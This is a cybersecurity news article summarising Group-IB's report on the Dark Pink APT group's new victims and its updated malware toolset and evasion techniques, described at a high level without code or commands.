Group-IB finds Dark Pink APT group operations may be larger than first assumed, uses modified kill chain

Group-IB Threat Intelligence identified that the Dark Pink APT group attacked five more previously unidentified victims, implying that the reach of the hackers could be much broader than previously thought. Although most attacks occurred in the Asia-Pacific region, two organizations based in Europe were also on the victim list, highlighting that the hacker’s geography could also be broader than initially thought.

Also tracked under the name Saaiwc Group, the Dark Pink APT group keeps updating its existing toolset to remain undetected. Group-IB uncovered in January eight attacks on entities based in the Asia-Pacific region and one organization based in Europe, including one unsuccessful attack. 

“Dark Pink has continued to attack government, military, and non-profit organizations in the Asia-Pacific expanding its operations to Thailand and Brunei. Another victim, an educational sector organization, has also been identified in Belgium,” Andrey Polovinkin, malware analyst at Group-IB, wrote in a Wednesday blog post. “It is important to emphasize that Dark Pink has carried out at least two attacks since the beginning of 2023. The most recent attack known to Group-IB started in April, with the latest files being detected in May. It means that the group shows no signs of slowing down.”

Polovinkin said that the technical indicators obtained during threat intelligence gathering activities suggest that Dark Pink keeps updating its tools to slip undetected past defense mechanisms and remains highly active. 

The Group-IB team found that Dark Pink leveraged the functionalities of an MS Excel add-in to ensure the persistence of TelePowerBot within the infected system. In a recent attack, Dark Pink exfiltrated stolen data over an HTTP protocol using a service called ‘Webhook.’ Dark Pink most likely uses different LOLBin techniques to evade detection on infected machines. It also disclosed that KamiKakaBot’s functionality has been split into two distinct parts: controlling devices and stealing sensitive data. In addition to distributing payloads through GitHub, the threat actors used the service TextBin[dot]net for the same purpose.

Polovinkin outlined in the post that on May 17, 2023, a file named ‘[Update] Counterdraft on the MoU on Rice Trade[dot]zip[dot]iso’ was uploaded to VirusTotal. “This ISO image is typical for Dark Pink and contains several items, including a signed file, a decoy document, and a malicious DLL. The infection chain corresponds to the last infection chain, as described in our previous report.” 

He added that the threat actor continues to use the MSBuild utility for launching KamiKakaBot (a tool designed to read and execute commands from a threat actor-controlled Telegram channel via Telegram bot) in the infection chain. The group has been using tools with the same functionalities as in previous attacks. Most of the changes seem to be intended to impede static analyses.

In the new version, KamiKakaBot’s functionality has been split into two distinct parts: controlling devices and stealing sensitive data, Polovinkin wrote. “As before, KamiKakaBot is loaded directly into the memory without being stored on the filesystem. The main part of KamiKakaBot has the same logic and has not changed from the initially discovered version. We examined several different samples, and in every case, the attackers added obfuscation to make static analyses more difficult,” he added.

While analyzing different variants of KamiKakaBot, “we noticed that the same functionality can be implemented in different ways.” 

When it comes to reconnaissance, Polovinkin said that the team identified multiple instances when Dark Pink used unconventional methods, which is not unusual for the group. “For instance, when launching the TelePowerBot, they modified the default file association and used SyncAppvPublishingServer[dot]vbs to initiate TelePowerBot. As regards the process of downloading archives, the files are downloaded using the ConfigSecurityPolicy utility, a component of Windows Defender used for managing settings and facilitating file transfers.”

During the reconnaissance stage, Dark Pink executed simple PowerShell commands, presumably to check whether specific files could be found on the infected device, he added. “Although specific examples of these tools being used have not been discovered, based on our research into and experience with Dark Pink, we believe that all of these tools can be used for proxy execution or downloading malicious payloads.”  

Polovinkin concluded that the fact that two attacks were executed in 2023 indicates that Dark Pink remains active and poses an ongoing risk to organizations. “Evidence shows that the cybercriminals behind these attacks keep updating their existing tools in order to remain undetected. All of the above means that all organizations must always be watchful and take proactive steps to protect themselves. Keeping up with the latest threats and regularly updating security tools and measures is essential,” he added.

Last week, the U.S. and international cybersecurity agencies released a cybersecurity advisory highlighting malicious activity executed by a People’s Republic of China (PRC) state-sponsored cyber hacker group, Volt Typhoon. The agencies have so far revealed that private sector partners have identified that this activity affects networks across U.S. critical infrastructure sectors and believe the hacker could apply the same techniques against these and other sectors worldwide.

Anna Ribeiro

Industrial Cyber News Editor. Anna Ribeiro is a freelance journalist with over 14 years of experience in the areas of security, data storage, virtualization and IoT.